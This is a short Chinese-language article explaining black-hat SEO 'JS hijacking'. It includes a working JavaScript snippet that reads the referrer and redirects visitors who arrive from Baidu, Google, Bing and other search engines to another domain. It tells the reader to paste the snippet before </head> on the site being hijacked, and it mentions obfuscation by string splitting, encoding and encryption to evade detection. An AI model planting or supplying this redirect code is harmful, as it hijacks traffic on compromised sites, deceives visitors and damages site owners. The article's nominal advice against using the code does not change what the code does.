黑帽SEO劫持手法簡要分析[附代碼]

搜索引擎劫持簡稱搜索劫持，其實就是從搜索引擎來的流量自動跳轉到指定的網頁。可以通過未經用戶授權，自動修改第三方搜索引擎結果的軟件實現，通常這類程序會在第三方搜索引擎的結果中添加自己的廣告或加入網站鏈接獲取流量等。也可以通過如下搜索引擎劫持代碼實現（屬于黑帽SEO需要掌握被劫持網站權限，建議不要使用）。

以上是百度百科對搜索引擎劫持的解釋。實戰派的不要太去在意這些理論，沒多大用處。

這里簡要分析搜索引擎劫持中的JS劫持。我在這簡要說一種，說多了，新手容易蒙圈。在這里我以一個網站舉例說明，認為是廣告的直接關掉頁面。當一個用戶在百度里面搜索一個關鍵詞“口罩機”，你會看到a.com這個域名的網站，你點擊進去他會自動跳轉到www.b.com這個域名上去。但是當你直接輸入域名a.com時候，你直接打開a.com這個網站的內容。這就是JS劫持。

是怎么實現的呢？我把最簡單的JS代碼粘貼出來。

<script type="text/javascript">

var regexp=/.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(.[a-z0-9-]+){1,2}//ig;

var where =document.referrer;

if(regexp.test(where))

{

window.location.href='http://www.a.com/'

}

</script>

你把此段代碼復制到需要劫持的網站</head>之前就可以上述功能，這JS代碼為了躲避搜索引擎的識別會有很多變種，應用的技術有字符串拼接拆分、字符串編碼轉化、加密等，但基本都是上面原理的變種，通過判斷來路來給用戶展現不同的頁面。